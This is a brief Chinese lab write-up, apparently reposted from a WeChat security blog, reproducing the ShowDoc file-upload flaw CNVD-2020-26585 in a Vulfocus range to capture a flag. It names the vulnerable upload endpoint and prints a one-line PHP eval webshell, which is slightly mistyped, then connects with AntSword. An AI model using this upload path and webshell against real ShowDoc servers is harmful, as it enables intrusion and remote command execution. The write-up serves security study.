前言
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。
1.搭建靶场
搭建Vulfocus 漏洞威胁分析平台,拉取漏洞镜像。
2.抓包分析
进入web之后,利用BP进行抓包分析,寻找好久也没有文件上传点,后再某漏洞平台需要在 /index.php?s=/home/page/uploadImg 进行构造请求包。
3.构造请求包
构造出请求包,上传咱们的一句木马,设置好连接密码。
<?php echo 'hello!!!';@eval($ POST['123']?>
4.返回木马位置
上传成功后,返回了木马URL链接,这时候我们只需要把链接
修改一下就可以了。
5.蚁剑链接获取Flag
使用蚁剑连接返回的链接,进入后台寻找Flag
由于找了好长时间,都没找到Flag,直接利用cmd进行寻找tmp目录,就直接看到了那金光闪闪的Flag。
原文始发于微信公众号(Attacker安全):复现showdoc 文件上传 (CNVD-2020-26585)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论